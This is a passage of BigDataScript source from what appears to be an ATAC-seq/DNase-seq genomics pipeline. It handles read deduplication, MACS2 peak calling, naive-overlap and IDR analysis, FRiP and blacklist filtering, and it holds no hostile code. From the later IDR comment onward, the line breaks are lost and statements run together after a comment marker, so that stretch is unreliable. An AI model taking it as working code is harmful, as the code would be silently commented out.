				suffix := fastqs_pair1.size()==1 ? "" : ":$pool_id"
				add_file_to_report( fastqs_pair1{pool_id}, "fastq 1$suffix", group, \
					"Raw reads/$long/Fastq 1$suffix" )
				add_file_to_report( fastqs_pair2{pool_id}, "fastq 2$suffix", group, \
					"Raw reads/$long/Fastq 2$suffix" )
				if ( trimmed_fastqs_pair1{pool_id}!=fastqs_pair1{pool_id} ) {
					add_file_to_report( trimmed_fastqs_pair1{pool_id}, "trimmed\\nfastq 1$suffix", group, \
						"Raw reads/$long/Trimmed fastq 1$suffix" )
				}
				if ( trimmed_fastqs_pair2{pool_id}!=fastqs_pair2{pool_id} ) {
					add_file_to_report( trimmed_fastqs_pair2{pool_id}, "trimmed\\nfastq 2$suffix", group, \
						"Raw reads/$long/Trimmed fastq 2$suffix" )
				}
			}
			add_file_to_report( p1, "pooled\\nfastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
				"Raw reads/$long/Pooled fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
			add_file_to_report( p2, "pooled\\nfastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
				"Raw reads/$long/Pooled fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
		}
		else {
			for ( string pool_id : fastqs_pair1.keys() ) {
				if ( trimmed_fastqs_pair1{pool_id}==fastqs_pair1{pool_id} ) {
					add_file_to_report( fastqs_pair1{pool_id}, "fastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
						"Raw reads/$long/Fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
				}
				else {
					add_file_to_report( fastqs_pair1{pool_id}, "fastq 1", group, \
						"Raw reads/$long/Fastq 1" )
					add_file_to_report( trimmed_fastqs_pair1{pool_id}, "trimmed\\nfastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
						"Raw reads/$long/Trimmed fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
				}
				if ( trimmed_fastqs_pair2{pool_id}==fastqs_pair2{pool_id} ) {
					add_file_to_report( fastqs_pair2{pool_id}, "fastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
						"Raw reads/$long/Fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
				}
				else {
					add_file_to_report( fastqs_pair2{pool_id}, "fastq 2", group, \
						"Raw reads/$long/Fastq 2" )
					add_file_to_report( trimmed_fastqs_pair2{pool_id}, "trimmed\\nfastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \
						"Raw reads/$long/Trimmed fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") )
				}
			}
		}
		mapped_reads := metric_prefix( parse_int( tmp_log{"mapped"} ) )
		bam{rep} = bam_
		add_file_to_report( bam_, "bam" + (mapped_reads ? "\\n$mapped_reads" : ""), group, \
			"Alignment/$long/Bam" + (mapped_reads ? " ($mapped_reads)" : "") )
	}
	string filt_bam_, dup_qc_, pbc_qc_, flagstat_nodup_qc_
	if ( is_input_fastq( rep ) || is_input_bam( rep ) ) {
		if ( is_input_bam( rep ) ) {
			bam_ = get_bam( 0, rep )
			bam{rep} = bam_
		}
		string deduped_reads
		if ( no_dup_removal ) {
			string tmp
			(filt_bam_, tmp ) \
				= dedup_bam_PE( bam_, aln_o_dir, qc_o_dir, group, nth_rep )
			wait
		}
		else {
			(filt_bam_, dup_qc_, flagstat_nodup_qc_, pbc_qc_ ) \
				= dedup_bam_PE( bam_, aln_o_dir, qc_o_dir, group, nth_rep )
			dup_qc{rep} = dup_qc_
			pbc_qc{rep} = pbc_qc_
			flagstat_nodup_qc{rep} = flagstat_nodup_qc_
			add_file_to_table( dup_qc_, "QC and logs/$long/Dedup. log")
			add_file_to_table( pbc_qc_, "QC and logs/$long/PBC log")
			add_file_to_table( flagstat_nodup_qc_, "QC and logs/$long/Filtered flagstat log")
			wait
			tmp_log := parse_flagstat( flagstat_nodup_qc_ )
			deduped_reads = metric_prefix( parse_int( tmp_log{"total"} ) )
		}
		// add to report
		filt_bam{rep} = filt_bam_
		add_file_to_report( filt_bam_, "filt. bam" + (deduped_reads ? "\\n$deduped_reads" : ""), group, \
			"Alignment/$long/Filtered & deduped bam" + (deduped_reads ? " ($deduped_reads)" : "") )
		if ( is_input_fastq( rep ) ) {
			string ENCODE_step_name
			if ( get_num_rep()==1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1"
			else ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1"
			if ( fastqs_pair1.size() > 0 || fastqs_pair2.size() > 0 ) {
				add_ENCODE_metadata_to_summary_json( "bam", "", "alignments", \
					ENCODE_step_name, filt_bam_, fastqs_pair1_arr+fastqs_pair2_arr )
			}
			if ( flagstat_qc_) {
				add_ENCODE_quality_metrics_to_summary_json( "samtools_flagstats_quality_metric", \
					ENCODE_step_name, [filt_bam_], [flagstat_qc_] )
			}
		}
	}
	// string bedpe, subsampled_bedpe, tag
	string bedpe, tag
	if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) ) {
		if ( is_input_filt_bam( rep ) ) {
			filt_bam_ = get_filt_bam( 0, rep )
			filt_bam{rep} = filt_bam_
		}
		bedpe = bam_to_bedpe( filt_bam_, aln_o_dir, group )
		wait
		if ( adjust_bedpe ) {
			tag = bedpe_to_tag_adj( bedpe, aln_o_dir, group )
		}
		else {
			tag = bedpe_to_tag( bedpe, aln_o_dir, group )
		}
		wait
	}
	string final_tag_, final_tag_pr1_, final_tag_pr2_
	if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) || is_input_tag( rep ) ) {
		if ( is_input_tag( rep ) ) tag = get_tag( 0, rep )
		string subsampled_tag
		if ( parse_number( subsample ) != 0 ) {
			subsampled_tag = subsample_tag_PE( tag, parse_number( subsample ), false, aln_o_dir, group )
			wait
		}
		else {
			subsampled_tag = tag
		}
		// TN5 shifting is an ATAC-specific correction; skipped for DNase-seq
		if ( is_dnase_seq() ) {
			final_tag_ = subsampled_tag
		}
		else {
			final_tag_ = tn5_shift_tag( subsampled_tag, aln_o_dir, group )
		}
		final_tag{rep} = final_tag_
		add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" )
		if ( !true_rep ) {
			aln_pr1_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr1" )
			aln_pr2_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr2" )
			( final_tag_pr1_, final_tag_pr2_ ) = spr_tag_PE( final_tag_, aln_pr1_o_dir, aln_pr2_o_dir, group )
			final_tag_pr1{rep} = final_tag_pr1_
			final_tag_pr2{rep} = final_tag_pr2_
			add_file_to_report( final_tag_pr1_, "tag-align", "$group-pr1", \
				"Alignment/Pseudo-replicates/$long/Pseudo-replicate 1/Tag-align" )
			add_file_to_report( final_tag_pr2_, "tag-align", "$group-pr2", \
				"Alignment/Pseudo-replicates/$long/Pseudo-replicate 2/Tag-align" )
			wait
		}
		if ( !no_xcor ) {
			subsampled_tag_xcor := subsample_tag_PE_for_xcor( final_tag_, parse_number( subsample_xcor ), true, aln_o_dir, group )
			wait
			// cross-corr. analysis
			string xcor_qc_, xcor_plot_
			( xcor_qc_, xcor_plot_ ) = xcor( subsampled_tag_xcor, qc_o_dir, group, nth_rep )
			xcor_qc{rep} = xcor_qc_
			xcor_plot{rep} = xcor_plot_
			add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" )
			add_file_to_table( xcor_plot_, "QC and logs/$long/Cross-corr. plot" )
			wait
			string ENCODE_step_name
			if ( pbc_qc_ && read_length_log ) {
				if ( get_num_rep() == 1 ) \
					ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1"
				else \
					ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1"
				add_ENCODE_quality_metrics_to_summary_json( "complexity_xcorr_quality_metric", \
					ENCODE_step_name, \
					[filt_bam_], [pbc_qc_, xcor_qc_, read_length_log], [ "true", xcor_plot_] )
			}
		}
	}
}

// When peaks are given directly as input, load them into the module-level
// peak variables/maps instead of calling them.
void read_input_peak() {
	if ( !is_input_peak() ) return
	// read peaks here
	for ( int rep=0; rep<=get_num_rep_peak(); rep++) { // rep==0 : pooled
		if ( get_num_rep_peak() == 1 && rep==0 ) continue // if only one replicate, skip reading pooled rep
		for (int pse=0; pse<=2; pse++) { // pse==0 : true rep
			if ( true_rep && pse > 0 ) continue
			peak_ := get_peak(rep,pse)
			if ( rep == 0 ) {
				if ( pse == 0 ) peak_pooled = peak_
				else if ( pse == 1 ) peak_ppr1 = peak_
				else if ( pse == 2 ) peak_ppr2 = peak_
			}
			else {
				if ( pse == 0 ) peak{rep} = peak_
				else if ( pse == 1 ) peak_pr1{rep} = peak_
				else if ( pse == 2 ) peak_pr2{rep} = peak_
			}
		}
	}
}

// Pool tagAligns (true reps and pseudo-reps), then run MACS2 on every
// replicate, pseudo-replicate, pooled replicate, and pooled pseudo-rep.
void call_peaks() { // for pooling two replicates and calling peaks on them
	if ( align ) return
	if ( is_input_peak() ) return

	// pool tag-aligns
	string[] tags, tags_pr1, tags_pr2
	for ( int rep=1; rep<=get_num_rep(); rep++ ) {
		tags.add( final_tag{rep} )
		if ( !true_rep ) {
			tags_pr1.add( final_tag_pr1{rep} )
			tags_pr2.add( final_tag_pr2{rep} )
		}
	}
	if ( get_num_rep() > 1 ) {
		aln_pooled_o_dir := mkdir( "$out_dir/align/pooled_rep" )
		final_tag_pooled = pool_tag( tags, aln_pooled_o_dir, "pooled_rep" )
		add_file_to_report( final_tag_pooled, "tag-align", "pooled_rep", "Alignment/Pooled replicate/Tag-align" )
		if ( !true_rep ) {
			// Make shifted tags for pooled pseudo rep (ppr).
			aln_ppr1_o_dir := mkdir( "$out_dir/align/pooled_pseudo_reps/ppr1" )
			aln_ppr2_o_dir := mkdir( "$out_dir/align/pooled_pseudo_reps/ppr2" )
			final_tag_ppr1 = pool_tag( tags_pr1, aln_ppr1_o_dir, "ppr1" )
			final_tag_ppr2 = pool_tag( tags_pr2, aln_ppr2_o_dir, "ppr2" )
			add_file_to_report( final_tag_ppr1, "tag-align", "ppr1", "Alignment/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Tag-align" )
			add_file_to_report( final_tag_ppr2, "tag-align", "ppr2", "Alignment/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Tag-align" )
		}
		wait
	}

	string tmp
	// call peaks for each replicate
	for ( int rep=1; rep<=get_num_rep(); rep++ ) {
		group := get_group_name( rep )
		long := get_long_group_name( rep )
		// call peaks
		peak_o_dir := mkdir( "$out_dir/peak/macs2/$group")
		sig_o_dir := mkdir( "$out_dir/signal/macs2/$group" )
		// signal track generation = true
		string peak_001_, gpeak_001_
		( peak_001_, fc_bigwig_001{rep}, pval_bigwig_001{rep} ) \
			= macs2_atac_npeak_and_signal( final_tag{rep}, "$smooth_win", macs2_pval_thresh_bw, true, peak_o_dir, sig_o_dir, group )
		peak_001{rep} = peak_001_
		add_file_to_report( peak_001{rep}, "n. peak\\np-val<$macs2_pval_thresh_bw", group, \
			"Peaks/MACS2/$long/Narrow peak (p-val thresh=$macs2_pval_thresh_bw)" )
		add_file_to_report( fc_bigwig_001{rep}, "signal fc", group, "Signal tracks/MACS2/$long/Fold enrichment" )
		add_file_to_report( pval_bigwig_001{rep}, "signal p-val", group, "Signal tracks/MACS2/$long/P-value" )
		if ( !disable_gb_peak ) {
			( gpeak_001_, tmp ) \
				= macs2_atac_gpeak_and_bpeak( final_tag{rep}, "$smooth_win", macs2_pval_thresh_bw, peak_o_dir, group )
			gpeak_001{rep} = gpeak_001_
			add_file_to_report( gpeak_001{rep}, "g. peak\\np-val<$macs2_pval_thresh_bw", group, \
				"Peaks/MACS2/$long/Gapped peak (p-val thresh=$macs2_pval_thresh_bw)" )
		}
		if ( macs2_pval_thresh_bw == macs2_pval_thresh ) { // if two p-val threshold are the same, skip one of them.
			peak{rep} = peak_001_
			if ( !disable_gb_peak ) {
				gpeak{rep} = gpeak_001_
			}
		}
		else {
			( peak{rep}, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag{rep}, "$smooth_win", macs2_pval_thresh, false, peak_o_dir, sig_o_dir, group )
			add_file_to_report( peak{rep}, "n. peak", group, "Peaks/MACS2/$long/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak{rep}, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag{rep}, "$smooth_win", macs2_pval_thresh, peak_o_dir, group )
				add_file_to_report( gpeak{rep}, "g. peak", group, "Peaks/MACS2/$long/Gapped peak" )
			}
		}
		if ( !true_rep ) {
			peak_pr1_o_dir := mkdir( "$out_dir/peak/macs2/pseudo_reps/$group/pr1" )
			peak_pr2_o_dir := mkdir( "$out_dir/peak/macs2/pseudo_reps/$group/pr2" )
			sig_pr1_o_dir := mkdir( "$out_dir/signal/macs2/pseudo_reps/$group/pr1" )
			sig_pr2_o_dir := mkdir( "$out_dir/signal/macs2/pseudo_reps/$group/pr2" )
			// ( peak_pr1{rep}, gpeak_pr1{rep} ) \
			( peak_pr1{rep}, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag_pr1{rep}, "$smooth_win", macs2_pval_thresh, false, peak_pr1_o_dir, sig_pr1_o_dir, "$group-pr1" )
			add_file_to_report( peak_pr1{rep}, "n. peak", "$group-pr1", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 1/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak_pr1{rep}, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag_pr1{rep}, "$smooth_win", macs2_pval_thresh, peak_pr1_o_dir, "$group-pr1" )
				add_file_to_report( gpeak_pr1{rep},"g. peak", "$group-pr1", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 1/Gapped peak" )
			}
			// ( peak_pr2{rep}, gpeak_pr2{rep} ) \
			( peak_pr2{rep}, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag_pr2{rep}, "$smooth_win", macs2_pval_thresh, false, peak_pr2_o_dir, sig_pr2_o_dir, "$group-pr2" )
			add_file_to_report( peak_pr2{rep}, "n. peak", "$group-pr2", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 2/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak_pr2{rep}, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag_pr2{rep}, "$smooth_win", macs2_pval_thresh, peak_pr2_o_dir, "$group-pr2" )
				add_file_to_report( gpeak_pr2{rep},"g. peak", "$group-pr2", "Peaks/MACS2/Pseudo-replicates/$long/Pseudo-replicate 2/Gapped peak" )
			}
		}
	}
	// call peaks for pooled replicates
	if ( get_num_rep() > 1 ) {
		peak_o_dir := mkdir( "$out_dir/peak/macs2")
		sig_o_dir := mkdir( "$out_dir/signal/macs2")
		pooled_o_dir := mkdir( "$peak_o_dir/pooled_rep" )
		pooled_sig_o_dir:= mkdir( "$sig_o_dir/pooled_rep" )
		// macs2 on pooled reps, signal tracks are generated
		( peak_pooled_001, fc_bigwig_001{"pooled"}, pval_bigwig_001{"pooled"} ) \
			= macs2_atac_npeak_and_signal( final_tag_pooled, "$smooth_win", macs2_pval_thresh_bw, true, pooled_o_dir, pooled_sig_o_dir, "pooled_rep" )
		// NOTE(review): the report labels below hard-code "thresh=.01" while
		// the per-replicate labels above use $macs2_pval_thresh_bw — the text
		// is wrong whenever -macs2_pval_thresh_bw != 0.01 (report text only).
		add_file_to_report( peak_pooled_001, "n. peak\\np-val<$macs2_pval_thresh_bw", "pooled_rep", "Peaks/MACS2/Pooled replicate/Narrow peak (p-val thresh=.01)" )
		add_file_to_report( fc_bigwig_001{"pooled"}, "signal fc", "pooled_rep", "Signal tracks/MACS2/Pooled replicate/Fold enrichment" )
		add_file_to_report( pval_bigwig_001{"pooled"}, "signal p-val", "pooled_rep", "Signal tracks/MACS2/Pooled replicate/P-value" )
		if ( !disable_gb_peak ) {
			( gpeak_pooled_001, tmp ) \
				= macs2_atac_gpeak_and_bpeak( final_tag_pooled, "$smooth_win", macs2_pval_thresh_bw, pooled_o_dir, "pooled_rep" )
			add_file_to_report( gpeak_pooled_001, "g. peak\\np-val<$macs2_pval_thresh_bw", "pooled_rep", "Peaks/MACS2/Pooled replicate/Gapped peak (p-val thresh=.01)" )
		}
		// macs2 on pooled reps
		if ( macs2_pval_thresh_bw == macs2_pval_thresh ) { // if two p-val threshold are the same, skip one of them.
			peak_pooled = peak_pooled_001
			if ( !disable_gb_peak ) {
				gpeak_pooled = gpeak_pooled_001
			}
		}
		else {
			( peak_pooled, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag_pooled, "$smooth_win", macs2_pval_thresh, false, pooled_o_dir, pooled_sig_o_dir, "pooled_rep" )
			add_file_to_report( peak_pooled, "n. peak", "pooled_rep", "Peaks/MACS2/Pooled replicate/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak_pooled, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag_pooled, "$smooth_win", macs2_pval_thresh, pooled_o_dir, "pooled_rep" )
				add_file_to_report( gpeak_pooled, "g. peak", "pooled_rep", "Peaks/MACS2/Pooled replicate/Gapped peak" )
			}
		}
		if ( !true_rep ) {
			ppr1_o_dir := mkdir( "$peak_o_dir/pooled_pseudo_reps/ppr1" )
			ppr2_o_dir := mkdir( "$peak_o_dir/pooled_pseudo_reps/ppr2" )
			ppr1_sig_o_dir := mkdir( "$sig_o_dir/pooled_pseudo_reps/ppr1" )
			ppr2_sig_o_dir := mkdir( "$sig_o_dir/pooled_pseudo_reps/ppr2" )
			// call peaks on ppr
			( peak_ppr1, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag_ppr1, "$smooth_win", macs2_pval_thresh, false, ppr1_o_dir, ppr1_sig_o_dir, "ppr1" )
			add_file_to_report( peak_ppr1, "n. peak", "ppr1", "Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak_ppr1, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag_ppr1, "$smooth_win", macs2_pval_thresh, ppr1_o_dir, "ppr1" )
				add_file_to_report( gpeak_ppr1, "g. peak", "ppr1","Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 1/Gapped peak" )
			}
			// ( peak_ppr2, gpeak_ppr2 ) \
			( peak_ppr2, tmp ) \
				= macs2_atac_npeak_and_signal( final_tag_ppr2, "$smooth_win", macs2_pval_thresh, false, ppr2_o_dir, ppr2_sig_o_dir, "ppr2" )
			add_file_to_report( peak_ppr2, "n. peak", "ppr2", "Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Narrow peak" )
			if ( !disable_gb_peak ) {
				( gpeak_ppr2, tmp ) \
					= macs2_atac_gpeak_and_bpeak( final_tag_ppr2, "$smooth_win", macs2_pval_thresh, ppr2_o_dir, "ppr2" )
				add_file_to_report( gpeak_ppr2, "g. peak", "ppr2","Peaks/MACS2/Pooled pseudo-replicates/Pooled pseudo-replicate 2/Gapped peak" )
			}
		}
	}
	wait
	print( "\n== Done call_peaks()\n" )
}

// Naive-overlap peak sets (true-rep pairs, pseudo-reps, pooled pseudo-reps)
// followed by FRiP on each; continues beyond this chunk.
void do_naive_overlap() {
	if ( align ) return
	// naive overlap peak
	overlap_o_dir := mkdir( "$out_dir/peak/macs2/overlap" )
	for ( int i=1; i<=get_num_rep(); i++ ) {
		for ( int j=i+1; j<=get_num_rep(); j++ ) {
			peak_overlap_true_o_dir := mkdir( "$overlap_o_dir/true_reps/rep$i-rep$j" )
			peak_overlap_tr{"$i,$j"} \
				= naive_overlap_peak( "narrowPeak", peak{i}, peak{j}, peak_pooled, \
					peak_overlap_true_o_dir, "rep$i-rep$j" )
			add_file_to_report( peak_overlap_tr{"$i,$j"}, "n. peak\\noverlap", "rep$i-rep$j", \
				"Peaks/MACS2/Naive overlap/True replicates/Rep. $i vs. Rep. $j/Narrow peak" )
		}
		if ( !true_rep ) {
			peak_overlap_pr_o_dir := mkdir( "$overlap_o_dir/pseudo_reps/rep$i" )
			peak_overlap_pr{i} \
				= naive_overlap_peak( "narrowPeak", peak_pr1{i}, peak_pr2{i}, peak{i}, \
					peak_overlap_pr_o_dir, "rep$i-pr" )
			add_file_to_report( peak_overlap_pr{i}, "n. peak\\noverlap", "rep$i-pr", \
				"Peaks/MACS2/Naive overlap/Pseudo-replicates/Replicate $i/Narrow peak" )
		}
	}
	if ( !true_rep && get_num_rep() > 1 ) {
		peak_overlap_ppr_o_dir := mkdir( "$overlap_o_dir/pooled_pseudo_reps" )
		peak_overlap_ppr \
			= naive_overlap_peak( "narrowPeak", peak_ppr1, peak_ppr2, peak_pooled, \
				peak_overlap_ppr_o_dir, "ppr" )
		add_file_to_report( peak_overlap_ppr, "n. peak\\noverlap", "ppr", \
			"Peaks/MACS2/Naive overlap/Pooled pseudo-replicates/Narrow peak" )
	}
	wait
	// FRiP calculation
	for ( int i=1; i<=get_num_rep(); i++ ) {
		for ( int j=i+1; j<=get_num_rep(); j++ ) {
			peak_overlap_true_o_dir := mkdir( "$overlap_o_dir/true_reps/rep$i-rep$j" )
			if ( final_tag_pooled ) {
				peak_overlap_qc_FRiP{"rep$i-rep$j"} = \
					FRiP( final_tag_pooled, peak_overlap_tr{"$i,$j"}, peak_overlap_true_o_dir, "rep$i-rep$j" )
				add_file_to_table( peak_overlap_qc_FRiP{"rep$i-rep$j"}, \
					"QC and logs/Naive overlap/True replicates/Rep. $i vs. Rep. $j/FRiP" )
			}
		}
		if ( !true_rep ) {
			peak_overlap_pr_o_dir := mkdir( "$overlap_o_dir/pseudo_reps/rep$i" )
			if ( final_tag.hasKey(i) ) {
				peak_overlap_qc_FRiP{"rep$i-pr"} = \
					FRiP( final_tag{i}, peak_overlap_pr{i}, peak_overlap_pr_o_dir, "rep$i-pr" )
				add_file_to_table( peak_overlap_qc_FRiP{"rep$i-pr"}, \
					"QC and logs/Naive overlap/Pseudo-replicates/Replicate $i/FRiP" )
			}
		}
	}
	if ( !true_rep && get_num_rep() > 1 ) {
		peak_overlap_ppr_o_dir := mkdir( "$overlap_o_dir/pooled_pseudo_reps" )
		if ( final_tag_pooled ) {
			peak_overlap_qc_FRiP{"ppr"} = FRiP( final_tag_pooled, peak_overlap_ppr, peak_overlap_ppr_o_dir, "ppr" )
			add_file_to_table( peak_overlap_qc_FRiP{"ppr"}, "QC and logs/Naive overlap/Pooled pseudo-replicates/FRiP" )
		}
	}
	wait
	qc_o_dir := mkdir( "$out_dir/qc" ) // create qc output dir.
// get final idr qc score, use idr final idr narrow peak files from true, pseudo and pooled pseudo reps if ( !true_rep ) { (peak_overlap_qc, peak_overlap_opt, peak_overlap_consv) = peak_overlap_final_qc( peak_overlap_tr, peak_overlap_pr, peak_overlap_ppr, overlap_o_dir, qc_o_dir, "" ) add_file_to_report( peak_overlap_qc, "Naive overlap QC log", "", "QC and logs/Naive overlap/Naive overlap QC log" ) add_file_to_report( peak_overlap_opt, "opt. naive overlap peak", "", "Peaks/MACS2/Naive overlap/Optimal set/Overlapping peak" ) add_file_to_report( peak_overlap_consv, "consv. naive overlap peak", "", "Peaks/MACS2/Naive overlap/Conservative set/Overlapping peak" ) } print( "\n== Done naive_overlap()\n" ) } void do_idr() { if ( align || !enable_idr ) return // do IDR peak_o_dir := "$out_dir/peak/macs2" idr_o_dir_old_version := "$peak_o_dir/../idr" idr_o_dir := "$peak_o_dir/idr" // for backward compatibility (old version has idr on out/peak), make symlink for old dir. to new dir. if ( path_exists( idr_o_dir_old_version ) ) { system := "local" task { sys cd $peak_o_dir sys rm -f idr sys ln -s ../idr } } else { idr_o_dir = mkdir( idr_o_dir ) } wait for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { idr_true_o_dir := mkdir( "$idr_o_dir/true_reps/rep$i-rep$j" ) (idr_tr{"$i,$j"}, idr_tr_png{"$i,$j"}, idr_tr_log{"$i,$j"} ) \ = idr2( peak{i}, peak{j}, peak_pooled, idr_thresh, "p.value", idr_true_o_dir, "rep$i-rep$j" ) add_file_to_report( idr_tr{"$i,$j"}, "IDR peak", "rep$i-rep$j", "Peaks/MACS2/IDR/True replicates/Rep. $i vs. Rep. $j/IDR peak" ) add_file_to_table( idr_tr_png{"$i,$j"}, "QC and logs/IDR/True replicates/Rep. $i vs. Rep. 
$j/IDR plot" ) } if ( !true_rep ) { idr_pr_o_dir := mkdir( "$idr_o_dir/pseudo_reps/rep$i" ) (idr_pr{i}, idr_pr_png{i}, idr_pr_log{i}) \ = idr2( peak_pr1{i}, peak_pr2{i}, peak{i}, idr_thresh, "p.value", idr_pr_o_dir, "rep$i-pr" ) add_file_to_report( idr_pr{i}, "IDR peak", "rep$i-pr", "Peaks/MACS2/IDR/Pseudo-replicates/Replicate $i/IDR peak" ) add_file_to_table( idr_pr_png{i}, "QC and logs/IDR/Pseudo-replicates/Replicate $i/IDR plot" ) } } if ( !true_rep && get_num_rep() > 1 ) { idr_ppr_o_dir := mkdir( "$idr_o_dir/pooled_pseudo_reps" ) (idr_ppr, idr_ppr_png, idr_ppr_log) \ = idr2( peak_ppr1, peak_ppr2, peak_pooled, idr_thresh, "p.value", idr_ppr_o_dir, "ppr" ) add_file_to_report( idr_ppr, "IDR peak", "ppr", "Peaks/MACS2/IDR/Pooled pseudo-replicates/IDR peak" ) add_file_to_table( idr_ppr_png, "QC and logs/IDR/Pooled pseudo-replicates/IDR plot" ) } wait // FRiP calculation for ( int i=1; i<=get_num_rep(); i++ ) { for ( int j=i+1; j<=get_num_rep(); j++ ) { idr_true_o_dir := mkdir( "$idr_o_dir/true_reps/rep$i-rep$j" ) if ( final_tag_pooled ) { idr_qc_FRiP{"rep$i-rep$j"} = \ FRiP( final_tag_pooled, idr_tr{"$i,$j"}, idr_true_o_dir, "rep$i-rep$j" ) add_file_to_table( idr_qc_FRiP{"rep$i-rep$j"}, \ "QC and logs/IDR/True replicates/Rep. $i vs. Rep. $j/FRiP" ) } } if ( !true_rep ) { idr_pr_o_dir := mkdir( "$idr_o_dir/pseudo_reps/rep$i" ) if ( final_tag.hasKey(i) ) { idr_qc_FRiP{"rep$i-pr"} = \ FRiP( final_tag{i}, idr_pr{i}, idr_pr_o_dir, "rep$i-pr" ) add_file_to_table( idr_qc_FRiP{"rep$i-pr"}, \ "QC and logs/IDR/Pseudo-replicates/Replicate $i/FRiP" ) } } } if ( !true_rep && get_num_rep() > 1 ) { idr_ppr_o_dir := mkdir( "$idr_o_dir/pooled_pseudo_reps" ) if ( final_tag_pooled ) { idr_qc_FRiP{"ppr"} = FRiP( final_tag_pooled, idr_ppr, idr_ppr_o_dir, "ppr" ) add_file_to_table( idr_qc_FRiP{"ppr"}, "QC and logs/IDR/Pooled pseudo-replicates/FRiP" ) } } wait qc_o_dir := mkdir( "$out_dir/qc" ) // create qc output dir. 
// get final idr qc score, use idr final idr narrow peak files from true, pseudo and pooled pseudo reps if ( !true_rep ) { (idr_qc, idr_opt, idr_consv) = idr_final_qc( idr_tr, idr_pr, idr_ppr, idr_o_dir, qc_o_dir, "" ) add_file_to_report( idr_qc, "IDR QC log", "", "QC and logs/IDR/IDR QC log" ) add_file_to_report( idr_opt, "opt. IDR peak", "", "Peaks/MACS2/IDR/Optimal set/IDR peak" ) add_file_to_report( idr_consv, "consv. IDR peak", "", "Peaks/MACS2/IDR/Conservative set/IDR peak" ) } print( "\n== Done do_idr()\n" ) } void log_number_of_peaks() { if ( align ) return log_o_dir := mkdir("$out_dir/qc") num_peak_log = "$log_o_dir/" + (title ? (title+"_") : "" ) + "number_of_peaks.txt" string lines for ( int rep=1; rep<=get_num_rep(); rep++) { // rep==0 : pooled if ( peak.hasKey(rep) ) \ lines += "rep$rep\t"+get_num_lines( peak{rep} )+"\n" if ( peak_pr1.hasKey(rep) ) \ lines += "rep$rep-pr1\t"+get_num_lines( peak_pr1{rep} )+"\n" if ( peak_pr2.hasKey(rep) ) \ lines += "rep$rep-pr2\t"+get_num_lines( peak_pr2{rep} )+"\n" } if ( peak_pooled ) \ lines += "pooled\t"+get_num_lines( peak_pooled )+"\n" if ( peak_ppr1 ) \ lines += "ppr1\t"+get_num_lines( peak_ppr1 )+"\n" if ( peak_ppr2 ) \ lines += "ppr2\t"+get_num_lines( peak_ppr2 )+"\n" // if ( peak_overlap_opt ) \ // lines += "overlap\t"+get_num_lines( peak_overlap_opt )+"\n" num_peak_log.write(lines) } // black list filter and then convert to bigbed (for true replicates only) void filter_peak_and_convert_to_bigbed() { if ( align ) return if ( !path_exists( blacklist ) ) return // peaks for true replicates if ( get_num_rep() > 1 ) { filt_peak_pooled_001 := \ blacklist_filter_peak( "narrowPeak", peak_pooled_001, peak_pooled_001.dirName(), "peak_pooled" ) string filt_gpeak_pooled_001 if ( !disable_gb_peak ) { filt_gpeak_pooled_001 = \ blacklist_filter_peak( "gappedPeak", gpeak_pooled_001, gpeak_pooled_001.dirName(), "gpeak_pooled" ) } wait peak_to_bigbed( "narrowPeak", filt_peak_pooled_001, filt_peak_pooled_001.dirName(), 
